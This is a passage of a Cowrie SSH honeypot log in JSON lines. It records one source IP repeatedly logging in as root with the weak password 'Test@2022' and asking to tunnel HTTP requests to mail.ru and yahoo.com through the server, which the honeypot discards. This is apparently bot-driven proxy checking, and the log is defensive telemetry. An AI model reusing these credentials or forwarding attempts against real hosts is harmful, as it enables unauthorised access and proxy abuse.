{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.022837Z","src_ip":"77.83.207.83","session":"977b11b6bc7b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.074875Z","src_ip":"77.83.207.83","session":"977b11b6bc7b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":61493,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8cf54c6ed9c","protocol":"ssh","message":"New connection: 77.83.207.83:61493 (1.2.3.4:22) [session: f8cf54c6ed9c]","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.123299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.124191Z","src_ip":"77.83.207.83","session":"f8cf54c6ed9c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.174298Z","src_ip":"77.83.207.83","session":"f8cf54c6ed9c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.423705Z","src_ip":"77.83.207.83","session":"f8cf54c6ed9c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22786,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:22786","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.474241Z","session":"f8cf54c6ed9c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.524117Z","src_ip":"77.83.207.83","session":"f8cf54c6ed9c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20883,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:20883","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.664080Z","session":"f8cf54c6ed9c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.713858Z","src_ip":"77.83.207.83","session":"f8cf54c6ed9c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":15018,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:15018","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.856293Z","session":"f8cf54c6ed9c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.906029Z","src_ip":"77.83.207.83","session":"f8cf54c6ed9c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:28.957011Z","src_ip":"77.83.207.83","session":"f8cf54c6ed9c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":61581,"dst_ip":"1.2.3.4","dst_port":22,"session":"e80040ae4612","protocol":"ssh","message":"New connection: 77.83.207.83:61581 (1.2.3.4:22) [session: e80040ae4612]","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.005318Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.015655Z","src_ip":"77.83.207.83","session":"e80040ae4612"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.055226Z","src_ip":"77.83.207.83","session":"e80040ae4612"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.302010Z","src_ip":"77.83.207.83","session":"e80040ae4612"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1234,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:1234","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.352291Z","session":"e80040ae4612"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.401733Z","src_ip":"77.83.207.83","session":"e80040ae4612"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":27622,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:27622","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.543859Z","session":"e80040ae4612"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.593437Z","src_ip":"77.83.207.83","session":"e80040ae4612"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":10544,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:10544","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.735986Z","session":"e80040ae4612"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.785524Z","src_ip":"77.83.207.83","session":"e80040ae4612"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.836000Z","src_ip":"77.83.207.83","session":"e80040ae4612"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":61671,"dst_ip":"1.2.3.4","dst_port":22,"session":"46eaf98a385f","protocol":"ssh","message":"New connection: 77.83.207.83:61671 (1.2.3.4:22) [session: 46eaf98a385f]","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.884670Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.885589Z","src_ip":"77.83.207.83","session":"46eaf98a385f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:29.935096Z","src_ip":"77.83.207.83","session":"46eaf98a385f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:30.182360Z","src_ip":"77.83.207.83","session":"46eaf98a385f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":29557,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:29557","sensor":"my-vps","timestamp":"2025-08-31T03:47:30.232744Z","session":"46eaf98a385f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:30.282312Z","src_ip":"77.83.207.83","session":"46eaf98a385f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":9345,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:9345","sensor":"my-vps","timestamp":"2025-08-31T03:47:30.423860Z","session":"46eaf98a385f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:30.473432Z","src_ip":"77.83.207.83","session":"46eaf98a385f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":22510,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:22510","sensor":"my-vps","timestamp":"2025-08-31T03:47:30.616051Z","session":"46eaf98a385f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:30.665648Z","src_ip":"77.83.207.83","session":"46eaf98a385f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:30.716012Z","src_ip":"77.83.207.83","session":"46eaf98a385f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":61764,"dst_ip":"1.2.3.4","dst_port":22,"session":"da5a73d2656f","protocol":"ssh","message":"New connection: 77.83.207.83:61764 (1.2.3.4:22) [session: da5a73d2656f]","sensor":"my-vps","timestamp":"2025-08-31T03:47:30.768071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:30.769054Z","src_ip":"77.83.207.83","session":"da5a73d2656f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:30.821757Z","src_ip":"77.83.207.83","session":"da5a73d2656f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:31.083341Z","src_ip":"77.83.207.83","session":"da5a73d2656f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13621,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:13621","sensor":"my-vps","timestamp":"2025-08-31T03:47:31.136726Z","session":"da5a73d2656f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:31.189338Z","src_ip":"77.83.207.83","session":"da5a73d2656f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26452,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:26452","sensor":"my-vps","timestamp":"2025-08-31T03:47:31.334911Z","session":"da5a73d2656f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:31.387481Z","src_ip":"77.83.207.83","session":"da5a73d2656f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":5767,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:5767","sensor":"my-vps","timestamp":"2025-08-31T03:47:31.534975Z","session":"da5a73d2656f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:31.587899Z","src_ip":"77.83.207.83","session":"da5a73d2656f"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:31.642026Z","src_ip":"77.83.207.83","session":"da5a73d2656f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":61855,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ba52e2ce6a1","protocol":"ssh","message":"New connection: 77.83.207.83:61855 (1.2.3.4:22) [session: 2ba52e2ce6a1]","sensor":"my-vps","timestamp":"2025-08-31T03:47:31.690927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:31.700763Z","src_ip":"77.83.207.83","session":"2ba52e2ce6a1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:31.741724Z","src_ip":"77.83.207.83","session":"2ba52e2ce6a1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:31.993090Z","src_ip":"77.83.207.83","session":"2ba52e2ce6a1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7402,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7402","sensor":"my-vps","timestamp":"2025-08-31T03:47:32.044609Z","session":"2ba52e2ce6a1"}
